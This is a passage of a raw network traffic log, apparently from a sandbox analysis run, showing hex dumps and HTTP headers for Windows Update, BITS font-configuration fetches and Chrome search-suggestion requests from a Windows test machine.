                                                                                                                                                                                                                    2024-04-25 19:55:05 UTC16384INData Raw: 5e 59 35 29 b0 b9 bf 60 eb d0 12 95 34 12 30 8a 85 eb ea 71 d8 27 df 27 54 a2 7e b0 75 1f 50 cb 2a e5 62 27 65 b8 75 bb 59 6f a9 94 99 4e ca 81 d6 cd a8 df 54 8a cf 49 79 b3 f5 3b 66 fd 5e 95 32 4a d7 b7 94 e9 af b4 7e d9 ac df a5 52 0e 38 29 2f b6 ae 37 eb 07 55 ca 1e 27 65 5b 60 c3 ed 34 cb ac ef 51 a9 a2 27 e0 c9 1f 07 36 d4 ab d4 67 55 ea 93 4e ea 0f 03 1b ae 52 a9 9b 54 aa d0 1b 79 9f 0a 6c b8 50 a5 6e 24 b5 75 1d 29 4f 04 36 4c 57 29 df 92 94 3b 48 79 24 b0 21 5d a5 3c 2c 29 37 90 f2 50 60 83 18 39 99 f5 0f 4a ca 42 52 ee 0f 6c f8 95 4a e9 96 94 2b 48 e9 0c 6c 78 49 a5 74 48 4a 7e 4b d9 d3 d2 df ab ce 1c 92 c8 eb 5c 49 9f af 9a 4c 7f ce 16 32 13 fb 9a 59 5c 00 ba de 3a 09 c0 f5 35 e9 b1 85 df b4 7d fc 18 87 66 ac b9 56 7e d2 8c 9e fd 62 fb d1 23 f3
                                                                                                                                                                                                                    Data Ascii: ^Y5)`40q''T~uP*b'euYoNTIy;f^2J~R8)/7U'e[`4Q'6gUNRTylPn$u)O6LW);Hy$!]<,)7P`9JBRlJ+HlxItHJ~K\IL2Y\:5}fV~b#
                                                                                                                                                                                                                    2024-04-25 19:55:05 UTC16384INData Raw: 74 21 8a 42 dc 82 3d be 81 7c d9 cd 47 06 75 51 81 5c 4b aa 44 c8 53 1a cc b1 c1 41 1d 61 f6 2e 55 fc 5b 62 8a 96 70 6e 0c 87 80 df 70 f3 df 4e 88 71 04 0c f9 29 63 65 00 49 75 55 88 5b 38 19 4c 30 44 29 ad c9 59 73 89 fa 70 5b 13 13 b5 6b 4d 56 c1 5e c5 fc a7 4f 52 2d 44 8b 98 9d d3 19 ab 3f 0c bd 55 d2 de a5 4a 13 b6 af f5 17 47 c2 7d 08 0a 11 0c 21 bb 99 6a 17 92 48 05 9a 11 fb cd 4b 12 f1 94 b5 07 f1 4b 42 e3 e9 04 ca 6d 96 81 7c 21 28 01 1e a0 16 45 88 70 e6 3c 22 e7 e9 e2 2d 9a 68 c6 46 16 6e 24 33 2c d9 3b 15 2c a0 b0 6c 9d 8c f9 4f 0e bf 8b 12 70 cf 0f 9f 03 46 50 d1 e8 11 09 13 11 7d a1 92 48 b8 80 02 02 af 58 75 7e de 09 f1 23 ce 39 99 07 b2 dc 6d 91 40 26 fb 4c 7f 3e de 67 35 80 00 4f 36 d1 22 ac 26 82 9e 1c 93 04 aa 3b a8 c1 63 e6 da f8 2c 1c
                                                                                                                                                                                                                    Data Ascii: t!B=|GuQ\KDSAa.U[bpnpNq)ceIuU[8L0D)Ysp[kMV^OR-D?UJG}!jHKKBm|!(Ep<"-hFn$3,;,lOpFP}HXu~#9m@&L>g5O6"&;c,
                                                                                                                                                                                                                    2024-04-25 19:55:05 UTC16384INData Raw: f8 96 d4 32 5f fe 94 d2 82 d8 74 03 fb 7b 7b 63 1f 1b d5 83 78 9e 81 f8 2d 52 e0 6b fc 89 5d 65 20 0e 51 90 48 06 e2 06 51 c0 79 e4 2a f0 12 27 f3 09 7c e6 0a a3 55 9d d7 bf a0 79 69 55 e7 e5 5e 15 7e ea 0f c5 70 6f 0f 53 dd af 17 92 5f 5b 91 53 56 c6 59 52 67 8b eb 8d d3 78 99 6d ce de d3 f9 e1 90 b3 9d 1f 64 fb b3 30 71 ea 83 a9 85 35 f0 35 8b 1c 5a f7 98 a1 7b ee 8f 0f cc 42 d4 71 6e 64 d6 a5 7a 9f 11 eb da d4 2f bc 24 b9 57 24 2e d7 a6 ab 89 a9 16 9e 6c 06 ed aa cd d2 22 b9 b5 18 af 36 fa df bb a4 eb e5 0c 45 6e b2 64 b9 de d8 71 d6 36 f3 d4 b2 29 16 4e 71 68 15 22 ad f2 59 04 c9 5a 5b 12 17 4d f0 b1 2f 21 c8 cf 31 18 24 9c af e2 9c c0 04 09 6a 68 f1 df a4 e6 8f ab 75 1d 0d d3 bc 53 f5 30 7a f0 66 5a b9 6a 7e 5d 00 23 53 df 5f e6 47 67 f2 2a 46 f5 ca
                                                                                                                                                                                                                    Data Ascii: 2_t{{cx-Rk]e QHQy*'|UyiU^~poS_[SVYRgxmd0q55Z{Bqndz/$W$.l"6Endq6)Nqh"YZ[M/!1$jhuS0zfZj~]#S_Gg*F
                                                                                                                                                                                                                    2024-04-25 19:55:06 UTC16384INData Raw: d3 5a 2d ff 09 25 9a 0e b4 e0 1b d7 3e a5 2e 61 a1 3d f4 9e b6 08 c9 49 8f 5e d3 4b 3c a6 9b 94 bf 87 34 69 ea 4d c5 24 61 8c 91 05 34 99 98 9e 0c 2e 36 41 48 8c 4d b4 0f 49 9d 2f cf f2 5c 22 dc 43 4e 6a 06 a0 56 9e 55 15 72 5a b3 c3 e1 4d 37 3e a6 85 af 58 b1 3c e8 f3 25 96 47 b3 a9 13 d9 34 5c 26 a3 a6 3d b2 e6 7f da b4 26 d6 b4 06 bd a3 49 23 a5 87 5c 0c e5 ae 86 e6 1e fa 5e 86 08 89 6b 46 af 15 6a e3 54 c3 49 57 b5 d1 03 df 26 e5 7d b4 ef 92 e8 07 d6 ca 80 26 b4 33 83 33 15 93 9b 0c 3f b4 76 dd 50 ca 74 6e 28 55 8c 86 6e ec b2 a1 d1 59 6d 0d f5 a1 86 46 3d d5 45 43 65 6d 7d 98 60 9f d8 f5 12 8c 68 a1 0f bd 8d c5 54 89 db 69 4c 85 26 a1 0b f7 f0 f7 43 ce 49 0d c7 31 a6 f8 03 94 64 2a 8e bd 07 3b 5a b5 c3 a4 87 a4 18 c9 86 7b 3d f4 dd 33 7a 2d 56 1b 65
                                                                                                                                                                                                                    Data Ascii: Z-%>.a=I^K<4iM$a4.6AHMI/\"CNjVUrZM7>X<%G4\&=&I#\^kFjTIW&}&33?vPtn(UnYmF=ECem}`hTiL&CI1d*;Z{=3z-Ve
                                                                                                                                                                                                                    2024-04-25 19:55:06 UTC16384INData Raw: 0b 96 a4 a2 15 f9 7f d9 16 2a 9b 02 1d e4 3d 1d 3c 11 08 6d e4 0f ea d7 2c 3c 3f d4 a3 8e 14 5c 09 63 a8 7d cf 08 7d ad c2 2f 44 a8 ed ed 9f 41 b6 b7 0c 6f b7 b3 11 99 83 fe 59 09 fb 0a ba b0 ef af e8 71 6e 21 d9 48 9e 6b 3f ba 9d 7d 9f 8a df b8 08 bd 4f ef a3 d2 c7 f9 1d d5 95 c8 a3 d6 d3 87 ac b5 bf ad da f5 78 a1 d4 5c b4 31 07 72 f4 86 6b 20 3c 46 be e9 6a 56 10 ea b2 f7 8b bd ee ae f5 b6 f5 e5 9f 3d ab 25 2f b7 f7 0d d6 7b a4 85 69 54 f4 f2 64 58 6e ba 36 6c 4e fc 4c 8e 42 3f 4a a7 b5 94 50 99 ad cf 12 5e b8 a4 87 ca 99 2a ad f0 8a 26 cb c3 fb 82 91 78 84 8f 57 5a f1 bb 09 a4 db cb a0 98 3d 9f 5e ca ec 94 8f 72 0b b4 2a 4d a4 f0 f6 8a a0 77 0e 1e 4e 53 39 1c bf b4 ab 7f a6 16 ef f6 a6 a7 b6 13 b2 d7 43 31 07 d9 18 1d 31 33 72 7e 4e 3b 11 87 2d 6d a9
                                                                                                                                                                                                                    Data Ascii: *=<m,<?\c}}/DAoYqn!Hk?}Ox\1rk <FjV=%/{iTdXn6lNLB?JP^*&xWZ=^r*MwNS9C113r~N;-m


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    56192.168.2.1649767184.31.62.93443
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:06 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                    2024-04-25 19:55:06 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                    Server: ECAcc (chd/0790)
                                                                                                                                                                                                                    X-CID: 11
                                                                                                                                                                                                                    X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                    X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                                    Cache-Control: public, max-age=126509
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:06 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    X-CID: 2


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    57192.168.2.164976823.54.200.130443
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:07 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                    If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                    Range: bytes=0-2147483646
                                                                                                                                                                                                                    User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                    Host: fs.microsoft.com
                                                                                                                                                                                                                    2024-04-25 19:55:07 UTC531INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                    ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                    ApiVersion: Distribute 1.1
                                                                                                                                                                                                                    Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                    X-Azure-Ref: 0rcGnYgAAAAANOnx9vccHTr21ROgX9ESTU0pDRURHRTAzMDkAY2VmYzI1ODMtYTliMi00NGE3LTk3NTUtYjc2ZDE3ZTA1Zjdm
                                                                                                                                                                                                                    Cache-Control: public, max-age=126476
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:07 GMT
                                                                                                                                                                                                                    Content-Length: 55
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    X-CID: 2
                                                                                                                                                                                                                    2024-04-25 19:55:07 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                    Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    58192.168.2.164976913.85.23.86443
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:09 UTC306OUTGET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=3pC1lROSsYyfH1k&MD=af7277zy HTTP/1.1
                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                    User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                                                    Host: slscr.update.microsoft.com
                                                                                                                                                                                                                    2024-04-25 19:55:09 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                    Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                    ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                                                                                                                                    MS-CorrelationId: 7a16d958-f463-4b30-a461-7ab7c3b9d6cf
                                                                                                                                                                                                                    MS-RequestId: fcf21b72-ace9-4c83-920f-592398e7ffbb
                                                                                                                                                                                                                    MS-CV: wydwWCiAJUW0/pCd.0
                                                                                                                                                                                                                    X-Microsoft-SLSClientCache: 2880
                                                                                                                                                                                                                    Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:08 GMT
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Content-Length: 24490
                                                                                                                                                                                                                    2024-04-25 19:55:09 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58
                                                                                                                                                                                                                    Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
                                                                                                                                                                                                                    2024-04-25 19:55:09 UTC8666INData Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31
                                                                                                                                                                                                                    Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    59192.168.2.164977364.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:10 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                    2024-04-25 19:55:10 UTC1703INHTTP/1.1 200 OK
                                                                                                                                                                                                                    Date: Thu, 25 Apr 2024 19:55:10 GMT
                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                    Expires: -1
                                                                                                                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                    Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                    Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-WGBuQ3Ja2RKkOZIynI2zPA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                    Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                    Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                    Permissions-Policy: unload=()
                                                                                                                                                                                                                    Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                                    Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                                    Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                    Server: gws
                                                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                    Accept-Ranges: none
                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                    2024-04-25 19:55:10 UTC1703INData Raw: 31 30 64 31 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 68 6f 6d 65 20 64 65 70 6f 74 20 68 61 6c 6c 6f 77 65 65 6e 20 73 6b 65 6c 65 74 6f 6e 20 64 6f 67 22 2c 22 75 6e 63 20 62 61 73 6b 65 74 62 61 6c 6c 20 72 6a 20 64 61 76 69 73 22 2c 22 6c 65 67 6f 20 6e 61 73 61 20 61 72 74 65 6d 69 73 20 73 70 61 63 65 20 6c 61 75 6e 63 68 20 73 79 73 74 65 6d 22 2c 22 73 65 76 65 72 65 20 77 65 61 74 68 65 72 22 2c 22 72 61 6c 65 69 67 68 20 64 75 72 68 61 6d 20 61 69 72 70 6c 61 6e 65 20 63 72 61 73 68 22 2c 22 73 68 6f 67 75 6e 20 73 65 72 69 65 73 20 66 69 6e 61 6c 65 22 2c 22 6c 61 6b 65 72 73 20 76 73 20 6e 75 67 67 65 74 73 22 2c 22 70 72 69 6d 65 20 65 6e 65 72 67 79 20 64 72 69 6e 6b 20 6c 61 77 73 75 69 74 20 70 66 61 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c
                                                                                                                                                                                                                    Data Ascii: 10d1)]}'["",["home depot halloween skeleton dog","unc basketball rj davis","lego nasa artemis space launch system","severe weather","raleigh durham airplane crash","shogun series finale","lakers vs nuggets","prime energy drink lawsuit pfas"],["","","",
                                                                                                                                                                                                                    2024-04-25 19:55:10 UTC1703INData Raw: 31 55 58 64 51 62 58 6c 4e 4e 55 56 61 62 56 46 7a 59 6d 78 47 51 58 5a 5a 56 7a 51 79 4e 31 6b 32 65 6b 52 4d 53 6b 74 6e 54 6c 68 75 53 32 39 5a 54 45 39 48 61 45 70 74 52 45 5a 54 56 44 4e 56 5a 6d 5a 45 63 57 68 54 53 33 56 72 63 55 6c 36 52 6b 4e 7a 52 43 74 57 52 6e 5a 79 53 31 63 31 51 55 68 79 4f 54 68 6d 55 6c 52 74 52 32 78 79 55 32 78 45 52 6b 31 35 59 6e 46 74 5a 30 46 30 59 32 6b 35 65 57 56 34 63 31 42 34 5a 32 6f 35 55 56 5a 61 52 6a 68 49 4e 7a 68 55 65 54 42 78 64 31 6b 72 55 6b 70 45 55 48 46 54 62 46 64 68 61 6e 46 68 62 55 39 4f 63 44 56 77 52 6d 68 61 54 47 31 34 55 7a 46 36 4e 6b 45 30 4e 6d 31 35 56 6b 6c 36 53 6c 52 61 57 6b 5a 48 62 30 5a 75 62 56 4e 55 57 55 35 61 5a 33 64 47 65 6a 49 76 4e 32 6c 72 65 53 39 4d 63 33 5a 71 55 6a
                                                                                                                                                                                                                    Data Ascii: 1UXdQbXlNNUVabVFzYmxGQXZZVzQyN1k2ekRMSktnTlhuS29ZTE9HaEptREZTVDNVZmZEcWhTS3VrcUl6RkNzRCtWRnZyS1c1QUhyOThmUlRtR2xyU2xERk15YnFtZ0F0Y2k5eWV4c1B4Z2o5UVZaRjhINzhUeTBxd1krUkpEUHFTbFdhanFhbU9OcDVwRmhaTG14UzF6NkE0Nm15Vkl6SlRaWkZHb0ZubVNUWU5aZ3dGejIvN2lreS9Mc3ZqUj
                                                                                                                                                                                                                    2024-04-25 19:55:10 UTC907INData Raw: 6c 32 64 33 70 6c 62 32 4a 49 65 45 4d 35 59 33 52 59 53 55 70 68 59 6c 42 4a 53 56 64 6c 65 6b 64 4a 64 55 52 76 55 47 78 31 55 44 64 71 65 48 42 4a 4e 44 64 75 51 55 64 61 64 55 31 32 5a 31 64 58 57 45 39 6f 56 6e 6c 43 64 6b 70 49 55 33 6c 59 57 58 52 30 65 57 4a 75 61 6a 49 33 4e 45 70 36 64 6b 74 68 52 45 78 4c 55 6a 59 72 54 32 30 32 63 44 46 49 4b 32 46 47 62 55 4a 31 59 6a 4e 4b 4d 7a 56 34 4d 57 74 31 56 6c 46 6b 53 32 35 78 4e 6e 42 5a 61 6e 42 58 4f 46 4e 4c 5a 30 46 52 53 47 55 30 64 48 52 6d 52 47 78 30 4d 6b 52 34 63 6a 4d 33 59 57 6b 78 5a 46 68 69 61 79 74 76 61 33 42 6a 64 48 49 34 4d 6d 35 68 5a 6b 31 61 55 6b 4a 68 55 46 68 78 62 6e 56 51 53 30 49 79 4b 31 41 35 4e 47 52 6c 51 33 4d 79 65 53 74 72 63 57 46 74 54 30 5a 59 61 32 70 43 63
                                                                                                                                                                                                                    Data Ascii: l2d3plb2JIeEM5Y3RYSUphYlBJSVdlekdJdURvUGx1UDdqeHBJNDduQUdadU12Z1dXWE9oVnlCdkpIU3lYWXR0eWJuajI3NEp6dkthRExLUjYrT202cDFIK2FGbUJ1YjNKMzV4MWt1VlFkS25xNnBZanBXOFNLZ0FRSGU0dHRmRGx0MkR4cjM3YWkxZFhiaytva3BjdHI4Mm5hZk1aUkJhUFhxbnVQS0IyK1A5NGRlQ3MyeStrcWFtT0ZYa2pCc
                                                                                                                                                                                                                    2024-04-25 19:55:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    60192.168.2.164977464.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:11 UTC649OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=vir&oit=1&cp=3&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    61192.168.2.164977564.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:11 UTC650OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=viru&oit=1&cp=4&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                    X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIlqHLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUX
                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9


                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                    62192.168.2.164977664.233.185.1054432940C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                    2024-04-25 19:55:11 UTC651OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=virus&oit=1&cp=5&pgcl=4&gs_rn=42&psi=3aV4RE0JYE4q_43B&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                                    Host: www.google.com
                                                                                                                                                                                                                    Connection: keep-alive
